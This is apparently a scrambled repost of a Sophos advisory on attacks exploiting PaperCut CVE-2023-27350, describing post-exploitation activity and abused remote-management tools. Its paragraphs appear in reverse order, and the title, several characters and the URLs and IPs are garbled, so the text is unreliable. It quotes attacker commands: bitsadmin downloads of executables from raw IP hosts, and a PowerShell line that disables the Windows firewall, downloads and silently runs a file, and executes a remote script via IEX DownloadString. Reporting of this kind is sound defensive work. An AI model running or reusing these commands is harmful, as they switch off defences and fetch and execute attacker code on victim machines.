7/6/2023 0 Comments Remotely definitionThe following SQL query can be used by Sophos XDR customers in their Sophos Central console to identify any suspicious activity, as well as be converted into a Sigma rule for non-Sophos customers. Upon receiving updated threat intelligence, Sophos MDR threat hunters immediately started searching across our customer base for any additional affected users. One such example of a miner, shown in Figure 3, details the commands to kill other miners before launching their own Monero (XMR) mining software.įigure 3: Miner-on-miner violence Determining impact with Sophos XDR At the time of writing, Sophos has observed the abuse of AnyDesk, Atera, Synchro, TightVNC, NetSupport, and DWAgent remote management tools across multiple campaigns.Īdditionally, some of the final payloads overlap with previously reported threats such as Truebot (downloader, often linked to Cl0p ransomware), Buhti (ransomware), MoneroOcean ( coinminer), and Mirai (botnet). The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. bitsadmin /transfer dwa /download /priority FOREGROUND http//23.184.4817/bootcamp.zip C:\ProgramData\bootcamp.zipīitsadmin /transfer mydownloadjob /download /priority normal http//192.184.35216:443/4591187629.exe %WINDIR%setup2.exe Sophos MDR has also observed the use of BITSAdmin, a commonly abused LOLBin, to download additional tools. Powershell $url=" $dst="C:\encexe" netsh advfirewall set allprofiles state off Invoke-WebRequest $url -OutFile $dst Start-Process $dst -windowstyle hidden Start-Sleep -s 10 powershell IEX ((New-Object Net.WebClient).DownloadString ('77:443/for.ps1')) This is just one example observed, as different threat groups execute PowerShell in a variety of ways. (Atera is of course legitimate software, seen in this situation being abused by the attackers.).įigure 2: PowerShell download of legitimate-but-abused Atera software Post-exploitation activity often results in PowerShell commands being executed by the pc-app.exe parent process, as seen in Figure 2 downloading Atera remote monitoring software to the victim. At the time of exploitation, Sophos MDR observed the following error log being generated:įigure 1: Error messages are an early sign that something is amiss The vulnerability details provided by Trend Micro’s ZDI indicate that the code allowing authentication bypass and remote code execution is found in the SetupCompleted Java class. To date, we have observed multiple threat groups target potential victims globally, with an overweight percentage in the educational sector. We quickly contained the affected server and engaged the customer to proceed with remediation. On April 17 - four days later and two days prior to the public announcement - Sophos MDR detected exploitation of a vulnerable PaperCut server at a customer in North America. That attack was identified by a SophosLabs threat researcher when Cobalt Strike was detected during post-exploitation activity. Sophos’ earliest observation of an affected user occurred on April 13. A patch was made available on March 8 and Sophos recommends that you apply it at the earliest opportunity on all vulnerable servers. This vulnerability affects PaperCut MF and NG Application and Site Servers version 8.0 and above across all supported operating systems. The vulnerability leveraged in the attack was in fact already addressed by a patch released the month prior – a situation commonly called an n-day attack. PaperCut offers multi-platform print management software, popular in the education sector. On April 19, 2023, software company PaperCut published an update to their advisory indicating exploitation of CVE-2023-27350 has been reported in the wild. In this posting we outline our observations on the threat environment around this vulnerability. Sophos X-Ops MDR and SophosLabs teams have been monitoring and researching activity around the PaperCut vulnerability CVE-2023-27350 since April 13, 2023. Last updated 08:45:00: Added “Timeline and Further Sophos Resources” section
0 Comments
Leave a Reply. |